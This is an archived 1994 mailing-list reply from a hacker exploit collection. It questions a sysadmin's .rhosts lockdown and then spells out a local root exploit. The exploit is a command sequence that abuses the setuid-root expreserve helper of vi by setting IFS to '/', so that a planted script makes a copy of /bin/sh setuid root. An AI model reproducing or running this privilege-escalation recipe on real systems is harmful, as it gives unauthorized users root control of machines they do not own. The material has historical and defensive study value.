home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / solaris / sol-expr.htm / text0000.txt < prev   
Encoding:
Text File  |  1997-02-23  |  1.3 KB  |  42 lines
  1.  
  2. On Sat, 15 Oct 1994, James Seng wrote:
  3.  
  4.  
  5.  
  6. > Anyway, what i did on my system is put a .rhosts file in every user 
  7.  
  8. > directory. chmod 000 .rhosts and chown root .rhosts. Not all user needs 
  9.  
  10. > .rhosts file. Those who wants to use them email me and i will chown back 
  11.  
  12. > to them. (any problem with that? :-)
  13.  
  15.  
  16. > James Seng Ching Hong ~{W/Uq:j~}    
  17.  
  18. > Technet Student Consultant, Technet Unit
  19.  
  20. > Internet: jseng@solomon.technet.sg 
  21.  
  22.  
  23.  
  24. If the users own their home directories, then what prevents them from
  25.  
  26. removing that file?
  27.  
  28.   Oh, I detect an OS-dependent feature here...
  29.  
  30.  
  31.  
  32. ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
  33.  
  34.   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
  35.  
  36.   with 'system()'.  So, do the following:
  37.  
  38.     % cd /tmp
  39.  
  40.     % cp /bin/sh fubar
  41.  
  42.     % cat > bin
  43.  
  44.     chmod 4755 fubar
  45.  
  46.     ^D
  47.  
  48.     % chmod u+x fubar
  49.  
  50.     % setenv IFS=/
  51.  
  52.     % vi
  53.  
  54.     :pre
  55.  
  56.     :q
  57.  
  58.     % fubar
  59.  
  60.     #
  61.  
  62.   Some versions of expreserve don't have the hole.
  63.  
  64.   Some versions of vi don't have the :pre command.
  65.  
  66.   One does not imply the other.
  67.  
  68.  
  69.  
  70. Argh.  Am I repeating 8lgm material here?
  71.  
  72. --
  73.  
  74. Charles Howes -- chowes@helix.net
  75.  
  76.  Always tell the truth, then you make it the other bloke's problem! 
  77.  
  78.  - Sean Connery, 1971   
  79.  
  80.  
  81.  
  82.